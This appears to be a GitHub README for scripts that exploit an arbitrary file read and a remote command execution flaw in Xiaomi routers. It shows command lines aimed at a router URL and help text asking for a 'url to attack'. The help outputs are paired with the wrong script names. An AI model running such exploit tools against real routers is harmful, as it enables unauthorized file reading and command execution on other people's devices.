/Xiaomi_attack

小米路由器 任意文件读取/远程命令执行漏洞 github脚本优化

Primary LanguagePython

优化后使用

格式

http://<url>:<port>

例子

python3 arbitrary_file_read_vulnerability.py -u http://192.168.0.1:8098                                   
python3 remote_command_execution_vulnerability.py -h
usage: arbitrary_file_read_vulnerability.py [-h] [-u remote_address]

arbitrary_file_read_vulnerability.py

options:
  -h, --help            show this help message and exit
  -u remote_address, --url remote_address
                        Please input url to attack.

python3 remote_command_execution_vulnerability.py -u http://192.168.0.1:8098 
python3 arbitrary_file_read_vulnerability.py -h
usage: arbitrary_file_read_vulnerability.py [-h] [-u remote_address]

arbitrary_file_read_vulnerability.py

options:
  -h, --help            show this help message and exit
  -u remote_address, --url remote_address
                        Please input url to attack.